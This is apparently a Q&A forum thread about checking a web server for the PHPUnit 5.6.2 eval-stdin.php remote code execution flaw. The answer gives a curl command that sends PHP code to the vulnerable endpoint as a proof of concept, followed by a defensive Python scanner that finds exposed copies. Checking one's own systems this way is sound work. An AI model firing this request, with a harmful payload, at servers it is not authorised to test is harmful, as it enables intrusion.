0 votes
by (111 points)
Let's say I've installed PHPUnit version 5.6.2, which is vulnerable to Remote Code Execution. How can I check for this vulnerability?

1 Answer

0 votes
by (172 points)

Let's say you have that vulnerable PHPUnit at http://localhost/vendor/phpunit/.

So you can check by printing the value of pi using this cURL command.

$ curl --data "<?php echo(pi());" http://localhost/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
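
A file-level check for the same script, as an added example that is not part of the original answer: it walks a web root on disk, finds every copy of the eval-stdin.php path used in the command above, and reports whether it evaluates the HTTP request body. The function name audit_docroot and the default web root /var/www/html are assumptions, as is the classification rule, which rests on vulnerable copies reading php://input while fixed PHPUnit releases read php://stdin.

```python
import os
import re

# Path of the script from the curl command above, relative to the vendor directory.
TARGET_SUFFIX = os.sep + os.path.join(
    "phpunit", "phpunit", "src", "Util", "PHP", "eval-stdin.php")
# Vulnerable copies eval() the HTTP request body; fixed copies read php://stdin.
READS_REQUEST_BODY = re.compile(r"eval\s*\(.*php://input", re.S)


def audit_docroot(docroot):
    """Return sorted (path, status) pairs for every eval-stdin.php under docroot.

    status is 'vulnerable' when the file evals php://input, otherwise
    'exposed': not exploitable this way, but vendor/ is still web-reachable.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            path = os.path.join(dirpath, name)
            if not path.endswith(TARGET_SUFFIX):
                continue
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            status = "vulnerable" if READS_REQUEST_BODY.search(source) else "exposed"
            findings.append((path, status))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/html"  # assumed web root
    for path, status in audit_docroot(root):
        print(f"{status:10} {path}")
```

Any hit, even one reported as exposed, means the vendor directory sits inside the web root; moving it out or denying HTTP access to it removes the entry point regardless of PHPUnit version.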